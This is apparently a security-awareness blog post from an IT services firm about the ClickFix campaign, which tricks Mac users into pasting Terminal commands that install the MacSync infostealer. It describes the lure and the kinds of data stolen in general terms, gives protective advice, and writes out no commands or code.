There is a common myth that keeps doing the rounds: “Macs don’t get viruses.” Unfortunately, that has never been entirely true, and a new wave of attacks reported by security researchers at Sophos makes the point louder than ever. A malware campaign known as “ClickFix” is now actively targeting macOS users, and it is spreading a nasty piece of software called the MacSync infostealer.
If your business uses Macs alongside Windows machines (and many do), this is one to pay attention to.
What is ClickFix?
ClickFix is not a traditional virus that sneaks in through a software vulnerability. Instead, it relies on good old-fashioned trickery. Attackers set up convincing fake websites and use sponsored Google search results to lure people in. Victims are then shown step-by-step instructions that persuade them to open the macOS Terminal app and paste in a command.
Because the user is the one actually running the command, many traditional security tools struggle to catch it. The attack does not exploit a bug in macOS itself. It exploits trust and human behaviour.
How Does the Attack Work?
Researchers observed several variations of the campaign between November 2025 and February 2026. Here is the general pattern:
1. Fake search results: Attackers bought sponsored Google ads for searches like “ChatGPT Atlas.” These ads appeared above the genuine results and led to fake websites designed to look like legitimate software download pages.
2. Convincing branding: The fake sites mimicked well-known brands such as OpenAI, and in some cases even used shared conversations on the real ChatGPT platform to add credibility.
3. Terminal command trick: Victims were told to open Terminal and paste a command to “install” or “optimise” their Mac. That command actually downloaded the MacSync malware in the background.
4. Password prompt: Once running, the malware asked for the user’s macOS password, giving it wide access to the system.
What Does MacSync Actually Steal?
Quite a lot, unfortunately. The latest version of MacSync is designed to hoover up a wide range of sensitive data, including: browser passwords, cookies, and saved form data from Chrome and Firefox-based browsers; macOS Keychain databases (where your saved passwords and certificates live); SSH keys, AWS credentials, and Kubernetes configuration files; documents from your Desktop, Documents, and Downloads folders; cryptocurrency wallet data and browser extensions; Telegram and Safari session data.
All of this gets bundled up into a ZIP file and sent back to the attackers. The malware can even tamper with cryptocurrency wallet applications like Ledger Live in an attempt to steal recovery phrases.
Why This Matters for Your Business
For years, Mac users have enjoyed a reputation for being “safer” than their Windows counterparts. And while macOS does have strong built-in security features, attackers have noticed that Apple’s growing market share makes Mac users a worthwhile target. This campaign is proof of that shift.
The key takeaway is that the attack works by tricking people, not by breaking software. That means no operating system is immune. Whether your team uses Windows, macOS, or a mix of both, the same principles of cyber awareness apply.
How to Protect Yourself and Your Team
Never run Terminal commands from a website. No legitimate software provider will ever ask you to open Terminal and paste a command to install their product. If you see this, close the page immediately.
Be cautious with sponsored search results. Attackers are increasingly buying ad space on Google to push malicious links above genuine results. Always double-check the URL before clicking.
Use endpoint protection on Macs too. Just as you would on a Windows machine, make sure your Macs have proper security software installed and kept up to date.
Keep your team informed. Regular cyber awareness training is one of the most effective defences. If your staff know what a social engineering attack looks like, they are far less likely to fall for one.
Download software from official sources only. Always go directly to the vendor’s website or the Mac App Store. Avoid downloading software from links found through search ads or unfamiliar websites.
The days of assuming Macs are safe from malware are behind us. Attackers go where the users are, and as Apple devices become more popular in homes and offices alike, the threats will keep coming. The good news is that staying safe does not require anything complicated. A healthy dose of scepticism, good security software, and a team that knows what to look out for will go a long way.
If you would like help reviewing the security of your Mac (or Windows) devices, or if you want to arrange cyber awareness training for your team, get in touch. We are always happy to help.
